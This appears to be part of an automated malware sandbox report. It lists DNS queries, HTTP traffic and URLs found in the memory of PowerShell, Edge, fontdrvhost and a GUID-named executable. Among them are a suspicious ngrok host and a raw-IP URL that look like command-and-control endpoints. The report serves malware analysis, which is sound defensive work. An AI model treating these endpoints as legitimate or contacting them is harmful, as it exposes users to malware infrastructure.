https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: m/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vice_worker.js blob: ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app
Source: global traffic	DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic	DNS traffic detected: DNS query: ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Content-Length: 207Content-Type: text/html; charset=utf-8Date: Tue, 17 Dec 2024 11:14:31 GMTServer: Werkzeug/3.0.3 Python/3.12.8Connection: close

Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0C6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0C6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app0
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: msedge.exe, 00000006.00000003.1642074850.0000584000398000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: msedge.exe, 00000006.00000003.1642074850.0000584000398000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: msedge.exe, 00000006.00000003.1642074850.0000584000398000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: msedge.exe, 00000006.00000003.1642074850.0000584000398000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: svchost.exe, 00000007.00000002.2690269306.0000024B7CE00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1634603766.0000024B7CC10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0ABD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://ubi.comd:/dev/assassin-playground/dx10_integration/main/extern/onlineservices/Tracking/Module
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.ubi.com
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.ubi.com/de
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.ubi.com/es
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.ubi.com/fr
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.ubi.com/it
Source: fontdrvhost.exe	String found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk
Source: fontdrvhost.exe, 0000001D.00000003.2471259225.0000000005ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvkkernelbasentdllkernel32GetProcessMitigatio
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0C6F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app
Source: powershell.exe, 0000000F.00000002.2247336096.000001CA08B96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2247873077.000001CA08E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.sprig.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/gsi/client
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0ABD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
